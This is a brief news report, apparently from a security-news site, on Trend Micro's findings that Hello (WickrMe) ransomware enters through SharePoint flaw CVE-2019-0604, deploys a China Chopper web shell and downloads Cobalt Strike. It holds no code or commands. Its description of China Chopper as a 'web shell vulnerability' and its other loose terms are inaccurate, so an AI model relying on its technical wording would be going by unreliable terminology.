skip to Main Content

Cybercrime, Hello ransomware uses China Chopper web shell vulnerability

Trend Micro: Hello ransomware uses updated China Chopper web shell vulnerability. The malware (aka WickrMe) arrives via the CVE-2019-0604. Then, the threat actors exploit web shell to download Cobalt Strike

Hello ransomware (aka WickrMe) now uses updated China Chopper Web Shell vulnerability. It has been discovered by Trend Micro cybersecurity experts. The malware arrives at a target system via Microsoft SharePoint vulnerability CVE-2019-0604. Then, the cybercrime actors exploit Cobalt Strike to pivot to the domain controller and launch the attacks. In particular, the China Chopper web shell is deployed to execute PowerShell commands, which in turn download a Cobalt Strike beacon. This leads to the infection of a targeted system with the ransomware payload. Moreover, the exploit is available for free in one forum. Once the machine has been infected, all files are encrypted and cannot be accessed or opened. Furthermore, additional password-stealing trojans and malware infections can be installed together.

Back To Top